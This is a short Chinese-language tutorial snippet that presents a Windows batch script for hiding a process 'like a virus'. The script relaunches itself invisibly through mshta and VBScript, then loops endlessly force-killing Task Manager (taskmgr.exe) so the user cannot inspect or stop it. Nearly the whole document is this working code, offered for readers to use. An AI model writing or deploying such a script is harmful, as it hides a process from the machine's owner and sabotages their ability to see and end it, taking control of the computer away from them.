病毒通常情况下都会隐藏自己的进程,咱们用批处理也能将自己隐藏,来看看

 

   
   
   
   
  1. @echo off  
  2. if "%1" == "h" goto begin  
  3. mshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close)&&exit  
  4. :begin  
  5. for /l %%i in (1,1,255) do taskkill /f /im taskmgr.exe>nul 2>nul&ping 127.0.1 /n 1>nul  
  6. goto begin